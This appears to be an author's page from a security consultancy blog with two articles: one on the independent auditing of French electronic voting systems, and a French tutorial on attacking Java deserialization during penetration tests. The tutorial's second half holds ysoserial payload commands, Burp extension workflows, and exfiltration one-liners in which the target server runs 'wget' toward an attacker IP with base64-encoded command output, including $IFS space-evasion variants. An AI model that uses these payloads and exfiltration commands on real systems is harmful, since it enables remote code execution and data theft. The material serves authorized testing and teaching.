Bilal Benseddiq, Auteur

Independent expertise of electronic voting systems

Bilal Benseddiq — Wed, 17 May 2023 15:07:10 +0000

Introduction

Definition of electronic voting

Electronic voting is a dematerialised, self-counting voting system in which voters use electronic devices to record their votes.

The system can be used remotely via internet voting, or in person where voters can visit polling stations equipped with voting machines.

History of electronic voting in France

The first traces date back to…1969!

The French Minister of the Interior, Raymond Marcellin, had the use of 100% mechanical voting machines authorised[i]. Due to major breakdown and the failure to reduce fraud, these machines fell into disuse, but the amendment made to the electoral code remained.

Use in professional elections

In the 2018 French public sector professional elections, 5.15 million public employees were asked to vote using an electronic voting solution.

In 2022, 5.6 million public employees in the three branches of the civil service are called upon to vote for their union representatives in the representative bodies. The ballot took place from the 1^st to the 8^th of December 2022. This was precedent in several respects, including the generalisation of electronic voting in the civil service and the establishment of new bodies for social dialogue[ii].

Experiments underway for voting by French citizens abroad

For the 2017 elections, the Ministry of Foreign Affairs and International Development had developed an online voting platform for French citizens living abroad to participate in the legislative elections.

Types of voting in French organisations

Since 2018 in the French private sector, it became compulsory for companies with more than 11 employees to hold elections for members of the staff delegation within the social and economic committees (CSE), by secret ballot

In all cases, the employer should inform the workforce every four years (unless the industry agreement provides for a shorter period of between two and four years) by posting notices of the elections.

How electronic voting works in the context of professional elections

Prior to the vote, the employer must call the professional elections specifying the date, place, and voting method (paper, electronic, or hybrid).

The organisation of elections is generally based on one or more centralised polling stations and regional polling stations, depending on the volume of votes and voters. The polling station members are trained, the solution is assessed, and test elections are held.

Once the solution has been validated it goes into production, and the election can begin:

The electoral lists are drawn up and unions or employees can check and report any errors or omissions.
Candidates can campaign to the voters and present their program.
On the day of the opening of the vote, the solution is sealed using private encryption keys, where 1/3 is held by the corporate administration and 2/3 by the trade unions.
Voters then vote according to the designated timetable, the polling stations monitor the counting of votes and assist the voters, the supervision unit monitors the process and manages any incidents, and the provider company is mobilised if necessary.
On the closing day of the elections, the integrity of the ballot box (urn) is checked, and the unsealing is carried out by the administration and the trade unions.
The counting of the votes is then carried out under the control of the centralising polling stations.
The results of the elections should be communicated to the voters, publicly displayed, and sent to the labour inspector (“Inspecteur du travail”).
The ballot box is sealed again, and the entire solution (including copies of source and executable programs, voting materials, vote count, results and backup files and files that keep track of interventions on the system) is archived under seal for a minimum of 2 years.
In the event of a dispute, an appeal may be lodged with the labour inspector or the district court.

What are the opportunities and risks in electronic voting?

Opportunities

Ease of implementation of the ballot

Electronic voting is generally more efficient to implement than paper voting, requiring less manual work for preparation (printing of propaganda posters, logistics, etc.), counting and reporting of results. This leads to a reduction in costs and an improvement in the efficiency of the electoral process.

Reducing the carbon footprint

Electronic voting greatly reduces the dependence on paper printing for electoral lists, propaganda documents, and especially ballot papers. It also drastically reduces travel depending on the geographical organisation of the company.

According to a study by Kercia[iv], the carbon footprint of a postal vote is more than twice that of an electronic vote.

Maximising participation and elected bodies with a broader electoral base

Electronic voting allows for greater voter participation.

A study conducted in Switzerland in 2011 showed that turnout increased by 2.2%[v] in cantons that implemented e-voting compared to those that did not use this method. Similarly, a study in Estonia in 2014 found that the use of e-voting increased voter turnout by 3-4%[vi].

Voters can vote remotely without having to physically travel to the polling station. This can increase voter turnout, especially in the context of the widespread use of remote work post-COVID-19.

Agreements with a stronger democratic basis

E-voting can help to strengthen social dialogue due to wider outreach and greater accessibility for voter participation. The results of elections are more convincing by increasing the participation in the polls.

Risks

Alteration of results

Electronic voting systems can be vulnerable to attacks such as the usurpation of voter accounts, multiple votes by the same voter in the same election, or the compromise of ballots.

Protection of personal data

The implementation of e-voting platforms should consider the risk of excessive collection of sensitive personal data such as voters’ political opinions.

Voters’ personal information may also be stored on vulnerable servers, exposing this data to the risk of compromised voting secrecy or data leakage.

Transparency of voting operations

It can be difficult for each stakeholder to understand how votes are recorded and how the results are tabulated, leading to mistrust of the solution and the election results.

These risks must be considered and mitigated in order to drastically reduce the probability of occurrence and/or their impact on the smooth running of the elections.

How to comply with the regulations?

CNIL deliberation 2019-053 of 25 April 2019

The CNIL (National Commission for Information Technology and Civil Liberties) deliberation n°2019-053 of 25 April 2019[vii] simplifies and clarifies the texts of 2010 and 2018. The process is as follows:

Choice of security level (1, 2 or 3) according to a questionnaire provided by the CNIL[viii].
Implementation of a test voting platform (iso-production) prior to the elections, with support from the independent expert in the event of questions relating to the conformity of the technical and organisational choices to be made.
Independent assessment of the solution to evaluate the compliance of the solution with the security objectives: depending on the defined risk level, the security objectives are more or less strict. These are cumulative, e.g., if a risk level of 3 is defined, the objectives of levels 1, 2 and 3 must be met.

Decree 2011-595 (public sector)

A regulation has been added to the CNIL deliberation 2019-053 for the public service and certain parastatal sector companies[ix] :

In addition to the CNIL security objectives, 18 articles composing this decree must be respected and checked by the independent expert. The control points include for example:

“At least 2/3 of the keys are allocated to the list delegates and at least 1 key is allocated to the president of the polling station or his representative.”
“The sealing is carried out by the combination of at least 2 encryption keys, including the one of the president of the polling station or his representative and the one of at least one list delegate”
“A process ensures that the voters’ list is only modified by the addition of a ballot electronical paper, which is issued by an authenticated voter casting the vote.”
“Each voter shall be provided at least fifteen days before the first day of the election with a means of authentication enabling him or her to participate in the election – the confidentiality of this means of authentication shall be guaranteed”
“A process ensures that the electronic ballot box (urn) is only modified by the vote of an authenticated voter”

Independent expertise

Obligation

“Any data controller implementing an electronic voting system, in particular via the Internet, must have its solution assessed by an independent expert, whether the voting solution is managed internally or provided by a service provider.” – CNIL Deliberation 2019-053

Modalities

When?

This expertise must be carried out:

Prior to the implementation of the electronic voting system
In the event of a design change to the existing electronic voting system
For every new election using the electronic voting system, even if it has already been audited

By whom?

By an independent expert, who must:

Be an IT (Information Technology) specialist in security
Not having an interest in the company that created the voting solution or in the organisation responsible for processing
If possible, have experience in analysing voting systems, having assessed the voting systems of at least two different providers.

Why?

To ensure compliance with the fundamental principles governing electoral operations:

The secrecy of the ballot
The personal and free nature of voting
The sincerity of the electoral operations
Effective monitoring of the vote by the electoral commission
A posteriori control by the election judge

Typical working approach

Our vision of independent expertise is illustrated by the main steps described in this chapter.

Initialisation and framing

To initiate the mission, a kick-off meeting is organised with the project contacts.

The purpose of this meeting is to introduce the teams, define the milestones and project schedule, specify the service monitoring procedures, the communication procedures between the parties (encryption of exchanges, etc.), collect the existing documentation, and set up the committee procedure.

Audit of the solution and expert support

This central phase of the assessment is based on a theoretical and practical analysis:

Control of project documentation and specifications
- From the “paper” phase onwards, it is necessary to ensure that all the points of compliance are present and in line with the regulations in force: technologies used and updates of the latter, hosting of the solution, physical security, architecture and high availability, partitioning between ballots, sealing and encryption techniques, means of compiling, correlating, communicating and deleting electoral lists, voter authentication scheme, etc.
Support in expertise and safety advice
- This involves providing ad hoc expertise on subjects relating to the legal and regulatory framework during the design and implementation phase of the solution and processes (g., choice of authentication factors, process for storing sealing keys, etc.).
Technical audit of the solution
- Architecture review to check the compliance of physical and logical partitioning, security of flows, hosting, high availability, etc.
- Audit of the organisation and processes such as sealing, authentication communication, archiving, etc.
- Technical configuration review of the key servers of the solution
- Audit of the source code and encryption mechanisms of the solution based, among other security frameworks, on the RGS[x] (Référentiel Général de Sécurité)
- Black-box and grey-box penetration testing of voting portals and the supervision back-office

Observation of test elections

This phase aims to simulate an election to check the correct application of the protocol and the processes verified beforehand on field:

Validation of the compliance monitoring process
- In this step, the aim is to verify that the technique used for the verification of the non-alteration of the system (fingerprinting) works.
Checks on the solution on field
- It is a matter of ensuring, in vivo, that all the points mentioned in terms of security and regulations are in place, for example through the analysis of application and system logs, or “random” checks: presence of temporary files containing sensitive information, capacity to collect data, etc.
Expertise support during the voting process and assistance in adapting procedures in case of unforeseen events

Accompaniment during the actual election

The same checks as during the test elections are carried out, and specifically:

System integrity check: Fingerprinting of essential system components (libraries, code, encryption libraries, etc.) and comparison of the fingerprints with those obtained beforehand.
Compliance with the regulatory framework: sealing process, access, and use of encryption/decryption keys, counting process, etc.

What are the pitfalls and how can they be avoided?

Limited access to systems

The high expertise market context of voting solutions may make vendors reluctant to share confidential information about their technology, such as source code, in the interests of industrial secrecy, which may limit the ability of experts to assess system compliance.

In order to avoid this pitfall, it is essential to implement regular communication and full transparency of the actions of the independent expert. Guarantees must be provided for the protection of the confidentiality of the data collected and processed via processes and an IS certified by SMSI or II 901[xi] (French norm for “Restricted Distribution” classified information).

Furthermore, we recommend that independent experts are flexible in their organisation, for example by agreeing to consult the source code exclusively on the provider’s premises.

Finally, it should be recalled that CNIL deliberation 2019-053 requires the service provider to make available “the source code corresponding to the version of the software actually implemented ” to the independent expert.

Distrust of trade unions and voters

Trade unions and voters can legitimately question the independence of the expert and the guarantees provided by the expertise, leading to mistrust of the electronic voting solution.

These fears are well-founded and must be addressed through transparency and the provision of factual and verifiable evidence for each observation reported during the assessment.

Furthermore, no findings should be ambiguous, conditional, or omitted.

Finally, it is essential to present the limits of the expertise exercise, and the logical impossibility of providing a 100% guarantee that the system cannot be attacked.

Interpretation of the regulations

The available regulations are not always clear and explicit, including

Non-standard architectures are not subject to specific rules
- Ex: An architecture based on an IS straddling the SaaS (Software as a Service) solution publisher and the employer’s IS
Some terms may be ambiguous
- g.: “A voter’s vote must be an atomic operation” – atomicity being a functional rather than a technical notion, e.g., Internet communication protocols do not allow the entire ballot to be contained in a single network packet

The application of security standards and frameworks (such as RGS), direct consultation with the CNIL, and the implementation of a solution that responds to the risk in substance are all ways of remedying this pitfall.

Conclusion and recommendations

To make the most of the independent expertise and to factualise it, we recommend combining the regulatory compliance approach with a risk-oriented approach, based on the technical audit (penetration tests, configuration reviews, etc.) in a logic of practical and pragmatic securing of the solution within the regulatory framework.

This exercise can only be carried out effectively and efficiently if all project stakeholders, including the publisher and trade unions, are involved and made aware of the project as early as the design phase.

Finally, it is necessary to bear in mind that e-voting is a constantly evolving technology. It is likely that new methods and technologies will emerge in the future, leading to an evolution of the regulations. Therefore, technical and regulatory monitoring is and will remain an essential subject for election organisers, publishers, and independent expertise companies alike.

For any information or quotation request on the subject of the independent expertise of electronic voting systems, we invite you to contact us via the following form: https://www.wavestone.com/fr/contact/

We wish you every success in organising your professional elections!

[i] https://www.legifrance.gouv.fr/jorf/id/JORFTEXT000000511691/

[ii]h ttps://www.economie.gouv.fr/elections-professionnelles-2022-quelques-minutes-pour-quatre-annees

[iii] https://fr.wikipedia.org/wiki/Comit%C3%A9_social_et_%C3%A9conomique

[iv]h ttps://www.kercia.com/vote-electronique

[v]h ttps://www.admin.ch/gov/fr/accueil/documentation/communiques.msg-id-37639.html

[vi]h ttps://www.smartmatic.com/fr/actualites/article/lestonie-atteint-des-taux-records-de-vote-par-internet-grace-a-une-nouvelle-technologie/

[vii] https://www.legifrance.gouv.fr/jorf/id/JORFTEXT000038661239

[viii] https://www.cnil.fr/fr/securite-des-systemes-de-vote-par-internet-la-cnil-actualise-sa-recommandation-de-2010

[ix] https://www.legifrance.gouv.fr/loda/id/JORFTEXT000024079803/

[x] https://www.ssi.gouv.fr/entreprise/reglementation/confiance-numerique/le-referentiel-general-de-securite-rgs/

[xi] https://www.ssi.gouv.fr/guide/recommandations-pour-les-architectures-des-systemes-dinformation-sensibles-ou-diffusion-restreinte/

Cet article Independent expertise of electronic voting systems est apparu en premier sur RiskInsight.

Techniques et outils d’attaque sur les moteurs de désérialisation (Java)

Bilal Benseddiq — Wed, 10 Jul 2019 09:00:29 +0000

Introduction

La sérialisation consiste à transformer un objet applicatif en un format de données pouvant être restauré ultérieurement. Ce procédé est utilisé pour sauvegarder des objets ou les envoyer dans le cadre de communications.

Exemple de sérialisation d’une variable de type String en Java:

String name = “Wavestone”;
FileOutputStream file = new FileOutputStream(“file.bin”);
ObjectOutputStream out = new ObjectOutputStream(file);
out.writeObject(name);

Le fichier file.bin contenant l’objet name sérialisé a cette forme :

AC ED 00 05 74 00 09 57 61 76 65 73 74 6f 6e 65 ….t..Wavestone

La chaîne commence par “AC ED” – il s’agit du code hexadécimal identifiant la donnée sérialisée, toutes les données sérialisées commencent par cette valeur.
Le protocole de sérialisation version “00 05”.
Le type de variable String est identifié par le code “74”.
Puis la taille de la variable “00 09”.
Et finalement la variable en elle-même.

La désérialisation est l’inverse de ce processus, prenant des données structurées à partir d’un format et les reconstruisant en un objet. Le format de données le plus répandu pour la sérialisation des données est JSON (dans le passé, le format XML était majoritaire).

Pour reprendre l’exemple en Java sus-cité :

FileInputStream file = new FileInputStream(“file.bin”);
ObjectInputStream out = new ObjectInputStream(file);name = (String)out.readObject();
System.out.println(name);

Le résultat dans la console sera donc

Wavestone

La fonction readObject est appelée pour désérialiser l’objet (à l’aide de ObjectInputStream) – et le convertir en String.

La désérialisation a de multiples cas d’usage pour les développeurs, par exemple (ici en Java) :

Désérialiser un objet “SQLConnection” pour se connecter à une base de données
Désérialiser un objet “User” pour récupérer des informations stockées dans une base de données en exécutant des requêtes SQL spécifiques
Désérialiser un objet “LogFile” pour restaurer les données précédemment enregistrées sur un profil utilisateur

De nombreux langages de programmation offrent une capacité native de sérialisation des objets. Ces formats natifs offrent généralement davantage de fonctionnalités que JSON ou XML, y compris la personnalisation du processus de sérialisation.

Malheureusement, les fonctionnalités de ces mécanismes de désérialisation natifs peuvent être détournées à des fins malveillantes lorsque la donnée à désérialiser est en fait une charge utile forgée spécifiquement par un attaquant pour être interprété comme du code à exécuter.

Les attaques contre les moteurs de désérialisation permettent notamment des attaques par déni de service, de contournement de contrôle d’accès et d’exécution de code à distance (RCE).

Exemple d’attaque : RCE

Cet exemple de code récupère un paramètre appelé csrfValue, qui est un jeton anti-CSRF présent sur une application web, envoyé à l’application sous forme de paramètre HTTP GET.

Pour cela, le paramètre est récupéré sous forme de String puis converti en ByteArrayInputStream et lu via la fonction readObject() pour être désérialisé.

String parameterValue = request.getParameter(“csrfValue”);
…
byte[] csrfBytes =DatatypeConverter.parseBase64Binary(parameterValue);
ByteArrayInputStream bis = new ByteArrayInputStream(csrfBytes);
ObjectInput in = new ObjectInputStream(bis);
csrfToken = (CSRF)in.readObject();

Cette fonction est potentiellement vulnérable: en effet, la fonction readObject() est appelé sur des valeurs envoyées par l’utilisateur en tant que paramètre csrfValue de la requête HTTP.

En effet, la fonction readObject() a pour spécificité de pouvoir être implémentée dans les classes Serializable qui en ont besoin pour lire un objet sérialisé.

Imaginons par exemple que la classe CSRF vue plus haut contienne pour une raison obscure ce morceau de code :

public class CSRF implements Serializable {
…
public String command = “ls”;
…
public void execCommand(){
…
Runtime.getRuntime().exec(this.command);
…
private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
…
this.execCommand();
}
}

L’attaquant n’aurait qu’à forger un objet CSRF sérialisé (récupéré par le code plus haut dans csrfValue) contenant un paramètre command contenant la commande de son choix pour exécuter du code arbitrairement sur le serveur.

En effet :

ObjectInputStream ne vérifie pas quelle classe est désérialisée
Il n’y a pas de liste blanche ou noire de classes autorisées à être désérialisées

Ce cas de figure très facile à exploiter d’une implémentation de readObject() exécutant directement du code est toutefois très rare dans la réalité.

Ce qui arrive le plus fréquemment est que l’attaquant trouve une fonction ou une classe vulnérable à la modification de ses paramètres, qui peut appeler une autre fonction ou instancier une autre classe dans son périmètre d’exécution.

Les classes et fonctions disponibles dans le périmètre d’exécution d’une application sont appelées « gadget ». Suite à l’envoi d’une charge malveillante à un premier gadget appelé « kick-off gadget », une chaîne d’appels et d’invocation est lancée jusqu’à tomber sur un gadget qui est vulnérable à l’exécution de code arbitraire, appelé « sink gadget » :

De nombreux sink gadget existent dans les librairies de sérialisation/désérialisation standard, notamment :

Spring AOP (dévoilé par Wouter Coekaerts en 2011)
Commons-ﬁleupload (dévoilé par Arun Babu Neelicattu en 2013)
Groovy (dévoilé par cpnrodzc7 / @frohoff en 2015)
Apache Commons-Collections (dévoilé par @frohoff et @gebl en 2015)
Spring Beans (dévoilé par @frohoff et @gebl en 2015)
Serial DoS (dévoilé par Wouter Coekaerts en 2015)
SpringTx (dévoilé par @zerothinking en 2016)
JDK7 (dévoilé par @frohoff en 2016)
Beanutils (dévoilé par @frohoff en 2016)
Hibernate, MyFaces, C3P0, net.sf.json, ROME (dévoilé par M. Bechler en 2016)
Beanshell (dévoilé par @pwntester et @cschneider4711 en 2016)
JDK7 Rhino (dévoilé par @matthias_kaiser en 2016)

Des outils générant des charges utiles spécialement conçues pour attaquer des gadgets affectés par des vulnérabilités publiques dans les librairies les plus utilisées existent, notamment le très complet ysoserial, développé par Frohoff : https://github.com/frohoff/ysoserial.

Exemple d’attaque : Compromission de compte utilisateur

Si un attaquant contrôle les données qui sont désérialisée par une application, il a alors une influence sur les variables en mémoire et les objets applicatifs. Il peut alors influencer le flux de code utilisant ces variables et ces objets.

Voyons un exemple d’attaque sur un morceau de code utilisant la désérialisation en Java :

public class Session {
public String username;
public boolean loggedIn;public void loadSession(byte[] sessionData) throws Exception {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sessionData));
this.username = ois.readUTF();
this.loggedIn = ois.readBoolean();
}
}

La méthode loadSession accepte un tableau d’octets en tant que paramètre et désérialise une chaîne et un booléen de ce tableau d’octets dans les propriétés username et loggedIn de l’objet.

Si un attaquant peut contrôler le contenu du tableau d’octets sessionData transmis à cette méthode, il peut alors contrôler les propriétés de cet objet : username et loggedIn.

Voici un exemple d’utilisation de cet objet Session dans une fonction de changement de mot de passe :

public class UserSettingsController {
public void updatePassword(Session session, String newPassword) throws Exception {
if(session.loggedIn) {
UserModel.updatePassword(session.username, newPassword);
} else {
throw new Exception(“Error: User not logged in.”);
}
}
}

Si le paramètre loggedIn de l’objet session vaut 1, le mot de passe de l’utilisateur dont le username correspond au paramètre idoine de l’objet session est mis à jour avec la valeur newPassword donnée.

Ici, si l’attaquant peut contrôler le contenu du tableau d’octets sessionData alors il pourrait changer le mot de passe de n’importe quel utilisateur !

C’est un exemple simple de « Property Oriented Programming Gadget », un morceau de code sur lequel l’attaquant peut agir non pas en direct mais via les propriétés d’un objet.

Un point important à retenir de cet exemple est qu’un exploit de désérialisation n’implique pas forcément l’envoi de classes ou de code au serveur à exécuter.

L’attaquant envoie simplement des données qui seront intégrées dans propriétés des classes dont le serveur a déjà connaissance afin de manipuler le code existant traitant de ces propriétés.

Un exploit réussi repose donc énormément sur la connaissance du code qui peut être manipulé par désérialisation. D’où beaucoup de difficultés à exploiter les vulnérabilités de type désérialisation malgré l’impact parfois colossal de ce type de failles.

Après la théorie, la pratique

Maintenant que vous savez tout (ou presque) sur la sérialisation/désérialisation Java et ses faiblesses, passons à la pratique :

Comment trouver les fonctions utilisant la désérialisation lors d’un test d’intrusion web et les librairies utilisées ?
Comment attaquer ces fonctions et potentiellement réussir à exécuter du code sur le serveur ?

Trouver les fonctions à attaquer

Méthode 1 : A la main, pour plus de finesse

La première étape de l’audit consiste à identifier l’utilisation de la désérialisation dans l’application auditée. Pour cela, différentes méthodes sont possibles :

Chercher la séquence hexadécimale suivante dans les transactions (capturées par burp) entre votre machine et le serveur : 0xAC ED.
- Cette séquence de 2 octets est appelée « magic number » et est présente au début de chaque objet sérialisé. Elle est suivie du numéro de version, souvent 00 05.
- Attention : Parfois, les objets sérialisés sont en plus encodés en base64, la séquence 0xAC ED devient alors rO0

Chercher des noms de classes Java dans les transactions, tels que java.rmi.dgc.Lease.
- Dans certains cas, les noms de classe Java peuvent apparaître dans un autre format commençant par un « L », se terminant par un « ; » et utilisant des barres obliques pour séparer les parties de l’espace de noms et le nom de la classe (par exemple, “Ljava / rmi / dgc / VMID;”).
- En raison de la spécification du format de sérialisation, d’autres chaînes peuvent être présentes, telles que “sr” pouvant représenter un objet (TC_OBJECT) suivi de sa description de classe (TC_CLASSDESC) ou “xp” pouvant indiquer la fin des annotations de classe, (TC_ENDBLOCKDATA) pour une classe qui n’a pas de super classe (TC_NULL).

Chercher l’entête Content-Type suivant : application/x-java-serialized-object

Après avoir identifié l’utilisation de données sérialisées, il faut identifier l’offset dans ces données où il est possible d’injecter une charge utile.

La cible doit appeler ObjectInputStream.readObject pour désérialiser et instancier un objet. Toutefois, elle peut appeler d’autres méthodes de ObjectInputStream, telles que readInt qui lira simplement un entier à 4 octets dans le stream. La méthode readObject lit les types de contenu suivants à partir d’un flux de sérialisation :

0x70 – TC_NULL
0x71 – TC_REFERENCE
0x72 – TC_CLASSDESC
0x73 – TC_OBJECT
0x74 – TC_STRING
0x75 – TC_ARRAY
0x76 – TC_CLASS
0x7B – TC_EXCEPTION
0x7C – TC_LONGSTRING
0x7D – TC_PROXYCLASSDESC
0x7E – TC_ENUM

Dans les cas les plus simples, la première chose lue dans le flux de sérialisation est directement l’objet à désérialiser, et nous pouvons donc insérer notre charge directement après l’en-tête de sérialisation à 4 octets.

Nous pouvons identifier ces cas en regardant les cinq premiers octets du flux de sérialisation. Si ces cinq octets sont un en-tête de sérialisation à quatre octets (0xAC ED 00 05) suivi d’une des valeurs répertoriées ci-dessus, nous pouvons attaquer la cible en envoyant notre propre en-tête de sérialisation à quatre octets suivis d’un objet malveillant (la charge).

Dans d’autres cas, l’en-tête de sérialisation à quatre octets sera probablement suivi d’un élément TC_BLOCKDATA (0x77) ou d’un élément TC_BLOCKDATALONG (0x7A). Le premier consiste en un unique octet suivi des données de bloc et le second consiste en quatre octets suivi des données de bloc.

Si les données sont suivies de l’un des types d’élément pris en charge par readObject, nous pouvons alors injecter une charge utile après les données de bloc.

Nick Bloor a écrit un outil, SerializationDumper, qui permet de faciliter cette analyse. Voici un exemple d’utilisation :

Dans cet exemple, le flux contient un TC_BLOCKDATA suivi d’un TC_STRING qui peut être remplacé par une charge utile.

Méthode 2 : Automatiquement pour plus d’exhaustivité

Pour détecter des fonctions utilisant la désérialisation de façon automatisée, il est aussi possible d’utiliser l’extension Burp Java Deserialization Scanner en tant que scanner passif, scanner actif, ou pour tester une fonction précise.

Les librairies vulnérables actuellement prises en charge par l’outil sont :

Apache Commons Collections 3 (up to 3.2.1)
Apache Commons Collections 4 (up to 4.4.0)
Spring (up to 4.2.2)
Java 6 and Java 7 (up to Jdk7u21)
Hibernate 5
JSON
Rome
Java 8 (up to Jdk8u20)
Apache Commons BeanUtils

Pour utiliser la fonction de scanner passif ou actif, il suffit d’aller dans l’onglet correspondant de Burp et attendre l’apparition d’éventuelles vulnérabilités :

Pour tester une fonction précise, il faut dans un premier temps intercepter une requête dans Burp, puis réaliser un clic droit et l’envoyer à Java DS :

L’outil permet de déterminer les charges utiles (gadgets) qui semblent fonctionner, donc de deviner les librairies utilisées par l’application pour la désérialisation:

A noter

Le plug-in Java DS repose sur un outil intégré de génération de charges utiles (gadgets) open source : ysoserial. Il est préférable d’utiliser la dernière version de l’outil, car elle inclut les types de charge les plus récents en fonction des vulnérabilités découvertes sur les librairies de sérialisation.

Une fois le projet créé, n’oubliez donc pas de modifier le plug-in Java DS pour qu’il pointe vers le fichier jar ysoserial que vous aurez préalablement téléchargé :

Attaquer les fonctions utilisant la désérialisation

La fonction de désérialisation utilisée par l’application peut :

Être écrite et redéfinie spécifiquement dans la classe de l’objet à désérialiser (override de la méthode readObject)
Être appelée dans une bibliothèque externe, la plus connue étant Apache Commons Collections (fonction Utils.DeserializeFromFile)
De nombreuses autres possibilités existent : méthode readResolve, méthode readExternal, méthode readUnshared, bibliothèque XStream, etc.

L’outil Java Deserialization Scanner aura permis d’identifier la librairie utilisée. La prochaine étape est donc de générer la charge utile (gadget) correspondant à la librairie en question.

Pour cela il existe 3 possibilités :

Générer un payload avec ysoserial puis l’envoyer au serveur
Utiliser l’extension Burp Java Deserialization Scanner
Utiliser l’extension Burp Java Serial Killer

Méthode 1 : YSoSerial

L’une des vulnérabilités les plus importantes liée à la désérialisation a été découverte dans la bibliothèque Apache Commons Collections.

Si une version vulnérable de cette bibliothèque (ou d’une autre bibliothèque vulnérable) est présente sur le système exécutant l’application utilisant la désérialisation, cette vulnérabilité peut entraîner l’exécution de code à distance.

Afin d’exploiter cette vulnérabilité, il est possible d’utiliser l’outil ysoserial, qui contient une collection d’exploits et permet de générer des objets sérialisés malveillants qui exécuteront des commandes lors de la désérialisation.

Il est juste nécessaire de spécifier la bibliothèque vulnérable. Voici un exemple pour Windows :

java -jar ysoserial-master.jar CommonsCollections5 calc.exe > wave.stone

Cela générera un objet sérialisé (fichier wave.stone) pour la bibliothèque vulnérable Apache Commons Collections et l’exploit exécutera la commande « calc.exe ».

Si le code suivant est présent côté serveur :

LogFile objet = new LogFile();
String file = “wave.stone”;// Désérialisation de l’objet
objet = (LogFile)Utils.DeserializeFromFile(file);

Alors après envoi de la charge malveillante au serveur (via Burp), l’output côté serveur sera le suivant :

Deserializing from wave.stone
Exception in thread “main” java.lang.ClassCastException:
java.management/javax.management.BadAttributeValueExpException
cannot be cast to LogFile at LogFiles.main(LogFiles.java:105)

Et le résultat sur le serveur sera l’exécution de calc.exe :

Méthode 2 : Java DS

À la suite de la phase de détection, nous savons qu’une charge utile (gadget) forgé pour CommonsCollections1 fonctionne contre notre cible.

En accédant à l’onglet « Exploiting » de Java DS, il est possible de créer et d’envoyer nos propres charges utiles.

Par exemple, pour tenter de lancer la commande uname -a sur le système Unix distant (si c’est un Unix) on entrera la commande suivante :

Le serveur renvoie ici un autre objet sérialisé en réponse, ce qui ne nous permet absolument pas de savoir si notre commande a réussi ou pas, ni d’avoir sa sortie.

Une technique permettant de valider l’exécution réussie de nos commandes consiste à utiliser un canal auxiliaire basé sur le temps : En mettant en pause le processus en cours d’exécution avec la commande Java Sleep, nous pouvons démontrer avec certitude que l’application est vulnérable en mesurant le temps de réponse du serveur.

Une charge utile basée sur la mise en pause du processus est donc suffisante pour identifier la vulnérabilité, mais si vous avez le temps et voulez aller encore plus loin, il est possible de récupérer cette sortie en déployant un serveur web sur votre machine, et en requêtant votre serveur web depuis le serveur cible.

Pour cela, sur votre machine d’audit, commencez par déployer un serveur web :

python -m SimpleHTTPServer 80

Et l’objectif va être de faire exécuter cette commande au serveur cible :

wget ip_attaquant/`uname -a | base64`

L’exploit de Apache Commons Collections fait transmettre notre commande à Apache Commons exec.

Par conséquent, les commandes sont invoquées sans avoir de shell parent, ce qui limite rapidement les actions… Mais on peut appeler un shell bash via Apache Commons exec via la commande bash -c.

Toutefois, Apache Commons exec parse les commandes en gérant très mal les espaces… Pour résoudre ce problème, on peut utiliser 2 approches :

Utiliser les fonctions de manipulation de chaîne en bash. Par exemple, cette commande charge le résultat en base64 de la commande echo yoloswag dans la variable c, qui est ensuite ajoutée au chemin de la requête wget :

bash -c c=`{echo,yoloswag}|base64`&&{wget,ip_attaquant/$c}’

Il est aussi possible d’utiliser la variable $IFS (séparateur de champs interne) à la place des espaces dans la commande transmise à Bash. Ici pour lancer un uname -a :

bash –c wget$IFSip_attaquant/`uname$IFS-a|base64`

Dernier point important : il peut être nécessaire d’échapper les barres obliques et les signes dollar dans certaines situations, tout dépend de la charge utile et des fonctions touchées.

Ici, avec une machine d’audit ayant pour IP 54.161.175.139 :

Le résultat côté serveur web sur la machine d’audit est le suivant :

Une requête depuis l’IP du serveur cible apparaît, vers une URL encodée en base64 et qui correspond à la sortie de la commande « uname -a ».

En effet, après une extraction de la donnée et son décodage base64 par la commande suivante :

tail -n1 access.log | cut -d/ -f4 | cut ‘d’’ -f1 | base64 -d

Le résultat suivant apparaît :

Vous avez donc exécuté une commande uname -a avec succès sur le serveur cible : vous êtes désormais un serial hacker accompli !

Le maître deserializateur veut vous serrer la main

Méthode 3 : Java Serial Killer

À la suite de la phase de détection, nous savons qu’une charge utile (gadget) forgé pour CommonsCollections1 fonctionne contre notre cible.

Vous pouvez alors utiliser l’extension Burp Java Serial Killer ; un clic-droit sur une requête POST contenant un objet Java sérialisé dans le body permet de l’envoyer à l’extension :

Allez ensuite dans l’onglet Burp « Java Serial Killer » :

Cet onglet prend en entrée :

Une commande à exécuter sur le serveur cible
La librairie vulnérable à exploiter

Par exemple, pour envoyer une requête ping à wavestone.com en utilisant le type de charge utile CommonsCollections1, car nous savons qu’elle fonctionne suite à la phase de détection :

Il est aussi possible d’encoder la charge en Base64, si c’est le format attendu par le serveur (voir la petite checkbox à droite de « Serialize »).

Conclusion

Vous avez désormais les bases théoriques permettant de comprendre les vulnérabilités liées à la désérialisation en Java, et les techniques et outillages pratiques permettant de les exploiter dans les librairies les plus connues, sans connaissance préalable du code applicatif.

Toutefois, il est à garder en tête que ces librairies ne sont pas utilisées dans 100% des cas de désérialisation, comme vu dans le chapitre « Exemple d’attaque : Compromission de compte utilisateur », où la vulnérabilité exploitée n’impliquait d’ailleurs même pas l’envoi de code au serveur à exécuter. Les exploits plus spécifiques reposent donc énormément sur la connaissance du code (ou l’ingénierie inverse sur ce code) qui peut être manipulé par désérialisation. D’où beaucoup de difficultés à exploiter les vulnérabilités de type désérialisation malgré l’impact parfois colossal de ce type de failles.

Par ailleurs, la sérialisation/désérialisation n’est pas un concept exclusif à Java, et se retrouve dans de nombreux autres langages de programmation, notamment :

Python : pickling / unpickling
PHP : serializing / deserializing
Ruby : marshalling / unmarshalling
…

La méthodologie globale reste la même, mais les outils peuvent varier (Freddy à la place de ysoserial pour les moteurs de désérialisation XML par exemple…).

La cheatsheet suivante peut donner de bonnes pistes d’audit pour ces autres langages et technologies :

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md.

Sources et références pour approfondir le sujet

Article Nytro sur la désérialisation Java

https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/

Article de Synopsys expliquant comment exfiltrer de la donnée via la désérialisation Java et contourner les principales limitations techniques que l’on peut rencontrer

https://www.synopsys.com/content/dam/synopsys/sig-assets/whitepapers/exploiting-the-java-deserialization-vulnerability.pdf

Cheatsheet pour la désérialisation Java

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet

La désérialisation Java avec Burp

